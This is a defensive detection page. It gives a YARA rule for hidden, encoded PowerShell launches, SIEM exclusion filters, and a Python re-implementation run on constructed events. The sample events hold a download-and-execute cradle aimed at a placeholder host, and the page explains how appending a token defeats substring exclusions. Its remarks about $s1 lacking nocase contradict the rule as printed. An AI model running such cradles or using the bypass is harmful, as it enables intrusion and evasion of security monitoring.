Adversaries may use PowerShell to execute malicious scripts, relying on how common legitimate PowerShell use is (including Azure administration) to blend in and evade detection. SOC teams should proactively hunt for this behavior to identify malware activity that may bypass traditional detection mechanisms; the rule below keys on the launch flags such scripts typically combine (execution-policy bypass, hidden window, encoded command) rather than on any particular payload.
YARA Rule
rule GEN_PowerShell
{
    meta:
        description = "Generic PowerShell Malware Rule"
        author = "https://github.com/interleaved"
    strings:
        // Anchor string; every group below must also match. `nocase` is required
        // here too, otherwise "PowerShell" or "POWERSHELL" in a command line is missed.
        $s1 = "powershell" nocase
        // execution policy / profile suppression
        $s2 = "-ep bypass" nocase
        $s3 = "-nop" nocase
        $s10 = "-executionpolicy bypass" nocase
        // hidden window
        $s4 = "-win hidden" nocase
        $s5 = "-windowstyle hidden" nocase
        $s11 = "-w hidden" nocase
        /*$s6 = "-noni" fullword ascii*/
        /*$s7 = "-noninteractive" fullword ascii*/
        // encoded command ($s8 is a prefix of $s9, so $s9 is redundant but harmless)
        $s8 = "-enc" nocase
        $s9 = "-encodedcommand" nocase
    condition:
        $s1 and (($s2 or $s3 or $s10) and ($s4 or $s5 or $s11) and ($s8 or $s9))
}
This YARA rule can be deployed in the following contexts:
This rule defines 11 string patterns, of which 9 are active in its detection logic; the two -noni/-noninteractive strings are commented out and do not take part in the condition.
Scenario: Scheduled job running a legitimate PowerShell script for system maintenance
Filter/Exclusion: ProcessName == "schtasks.exe" AND FileName == "C:\\Windows\\System32\\schtasks.exe"
Note: this filter suppresses schtasks.exe itself, not the powershell.exe process the task launches, so the PowerShell event still matches. Scope the exclusion to the PowerShell event instead: its parent is the Task Scheduler service's svchost.exe, and the task's known script path can be required in the command line.
Scenario: Admin using PowerShell to configure group policy or registry settings
Filter/Exclusion: ProcessName == "powershell.exe" AND CommandLine LIKE "%Set-ItemProperty%"
Scenario: PowerShell script used for software deployment via Microsoft Intune or SCCM
Filter/Exclusion: ProcessName == "powershell.exe" AND CommandLine LIKE "%Invoke-Command -ComputerName%"
Scenario: System using PowerShell for log parsing or monitoring with tools like Splunk or ELK
Filter/Exclusion: ProcessName == "powershell.exe" AND CommandLine LIKE "%Import-CSV%"
Scenario: PowerShell script used for automated backup or data synchronization
Filter/Exclusion: ProcessName == "powershell.exe" AND CommandLine LIKE "%Copy-Item -Path C:\\Backups\\%"
Note: every CommandLine LIKE filter above is a bare substring match and is therefore bypassable: an adversary who appends the excluded token to an otherwise malicious command line (for example a trailing "# Import-CSV" comment) silences the alert. Treat them as starting points, tie each exclusion to additional stable attributes (full script path, script signature, parent process, executing account) rather than a single substring, and review exclusion hit counts periodically.
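As an added worked example (not the page's or the rule author's own code), the rule's condition is re-implemented below in plain Python so it can be run without the yara module, the page's CommandLine exclusions are applied on top of it, and an -EncodedCommand decoder is included for triage. Run over constructed sample command lines, it shows the case-sensitivity gap of `$s1` when `nocase` is omitted, that a substring exclusion is satisfied by an attacker who simply appends the token, and how to recover the script behind `-enc` (base64 of UTF-16LE text). The events, their field names (ProcessName, CommandLine, mirroring the page's filters), the download-cradle payload and the hostname in it are all constructed for the example; the assumption that LIKE compares case-insensitively is noted in the code.

```python
"""Plain-Python re-implementation of the GEN_PowerShell condition plus the page's
CommandLine exclusions, run over constructed sample events (no yara module needed)."""
import base64
import binascii
import re
from typing import Optional

# String groups from the rule; all compared case-insensitively against the
# lower-cased command line (the original $s1 lacks `nocase`; see s1_nocase below).
EXEC_POLICY = ("-ep bypass", "-nop", "-executionpolicy bypass")      # $s2 | $s3 | $s10
WINDOW_HIDDEN = ("-win hidden", "-windowstyle hidden", "-w hidden")  # $s4 | $s5 | $s11
ENCODED = ("-enc", "-encodedcommand")                                # $s8 | $s9

# Exclusions from the page, as (ProcessName, CommandLine substring) pairs.
EXCLUSIONS = (
    ("powershell.exe", "Set-ItemProperty"),
    ("powershell.exe", "Invoke-Command -ComputerName"),
    ("powershell.exe", "Import-CSV"),
    ("powershell.exe", "Copy-Item -Path C:\\Backups\\"),
)


def gen_powershell_matches(cmdline: str, s1_nocase: bool = True) -> bool:
    """$s1 and (($s2 or $s3 or $s10) and ($s4 or $s5 or $s11) and ($s8 or $s9))."""
    low = cmdline.lower()
    # s1_nocase=False reproduces the original rule, where $s1 is case-sensitive.
    s1 = "powershell" in (low if s1_nocase else cmdline)
    return (s1
            and any(a in low for a in EXEC_POLICY)
            and any(a in low for a in WINDOW_HIDDEN)
            and any(a in low for a in ENCODED))


def is_excluded(event: dict) -> bool:
    """ProcessName == X AND CommandLine LIKE '%Y%'. Assumption: LIKE is
    case-insensitive, as it is in most SIEM query languages."""
    name, cmd = event["ProcessName"].lower(), event["CommandLine"].lower()
    return any(name == p and s.lower() in cmd for p, s in EXCLUSIONS)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind -e/-ec/-enc/-EncodedCommand: base64 of UTF-16LE text.
    Returns None when no decodable token is present (e.g. only -ep bypass)."""
    m = re.search(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(events) -> list:
    """Run rule, exclusions and decoder over each event; 'alert' is what the SOC sees."""
    out = []
    for ev in events:
        matched = gen_powershell_matches(ev["CommandLine"])
        excluded = is_excluded(ev)
        out.append({
            "matched": matched,
            "excluded": excluded,
            "alert": matched and not excluded,
            "decoded": decode_encoded_command(ev["CommandLine"]),
        })
    return out


# Constructed sample payload: a typical download cradle, encoded the way -enc expects.
PAYLOAD_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
PAYLOAD_B64 = base64.b64encode(PAYLOAD_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed sample events in the shape the page's filters use.
SAMPLE_EVENTS = [
    # 1: classic no-profile, hidden-window, encoded launch -> alert
    {"ProcessName": "powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {PAYLOAD_B64}"},
    # 2: same launch in mixed case; the original $s1 (no `nocase`) misses it
    {"ProcessName": "powershell.exe",
     "CommandLine": f"PowerShell -NoP -W Hidden -Enc {PAYLOAD_B64}"},
    # 3: benign admin script: policy bypass, but visible window and no encoding -> no match
    {"ProcessName": "powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\maint.ps1"},
    # 4: event 1 with the page's Import-CSV token appended as a comment -> alert suppressed
    {"ProcessName": "powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {PAYLOAD_B64} # Import-CSV"},
]

if __name__ == "__main__":
    for ev, res in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(f"alert={res['alert']!s:5} match={res['matched']} excluded={res['excluded']} "
              f"decoded={res['decoded']!r}")
        print(f"    {ev['CommandLine'][:72]}")
```

Event 2 is the one to watch when porting the rule: with `s1_nocase=False` it is missed entirely, which is why `nocase` belongs on `$s1`. Event 4 demonstrates the exclusion problem from the scenarios above: the rule fires, but the Import-CSV substring filter discards the alert.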